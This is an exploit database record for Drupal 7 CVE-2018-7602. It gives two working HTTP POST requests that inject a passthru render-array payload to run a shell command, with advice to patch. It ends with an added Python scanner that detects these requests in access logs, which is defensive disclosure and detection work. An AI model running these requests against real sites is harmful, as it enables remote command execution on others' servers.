Vendor: Drupal
By: Blaklis
CVSS: 9.8 (CRITICAL)
Remote Code Execution
CWE: 78
Product Name: Drupal
Affected Version From: Drupal 7
Affected Version To: Drupal 7
Patch Exists: YES
Related CWE: CVE-2018-7602
CPE: a:drupal:drupal:7
Other Scripts: N/A
Platforms Tested: None
2018

Exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602

This exploit requires authentication and permission to delete a node. The attacker sends a POST request to the vulnerable form, retrieves the form_build_id from the response, and then sends a second POST request with that form_build_id to trigger the exploit. The response then displays the result of the whoami command.

Mitigation:

Patch your systems

Exploit-DB raw data:

This is a sample exploit for the new Drupal 7 vulnerability SA-CORE-2018-004 / CVE-2018-7602.

You must be authenticated and have the power to delete a node. Some other forms may be vulnerable: at least all forms that are 2-step (form, then confirm).

POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]

Retrieve the form_build_id from the response, and then trigger the exploit with:

POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]

This will display the result of the whoami command.

Patch your systems!
Blaklis
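
A detection check for the two request shapes shown above, as an added example that is not part of the original Exploit-DB post: it percent-decodes each logged request target until it stops changing (so `%2523` becomes `#`) and flags `#`-prefixed keys in parameter names or path segments. The log lines, addresses, form id placeholder and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches a render-array style key: "[#name]" in a parameter name, or a
# "/#name" path segment, once all percent-encoding layers are removed.
HASH_KEY = re.compile(r"\[#\w*\]|/#\w+")
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so %2523 -> %23 -> # is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious(log_line):
    """Return the matched '#' keys for one access-log line, or []."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    return HASH_KEY.findall(fully_decode(m.group("target")))


def scan(lines):
    """Yield (line_number, hits) for every line that carries '#' keys."""
    for n, line in enumerate(lines, 1):
        hits = suspicious(line)
        if hits:
            yield n, hits


# Constructed sample access-log lines (combined log format, not real traffic).
SAMPLE = [
    '203.0.113.5 - - [26/Apr/2018:10:00:01 +0000] "GET /?q=node/99 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [26/Apr/2018:10:00:02 +0000] "POST /?q=node/99/delete&destination=node?q[%2523][]=x%26q[%2523type]=markup HTTP/1.1" 200 7331',
    '203.0.113.5 - - [26/Apr/2018:10:00:03 +0000] "POST /?q=file/ajax/actions/cancel/%23options/path/form-PLACEHOLDER HTTP/1.1" 200 412',
    '198.51.100.7 - - [26/Apr/2018:10:00:04 +0000] "GET /?q=taxonomy/term/3&page=1%2C2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE):
        print(f"line {n}: render-array style keys {hits}")
```

Access logs record only the request line, so this covers the query string and path; `#` keys carried in a POST body need the same check applied at a WAF or in request-body logging.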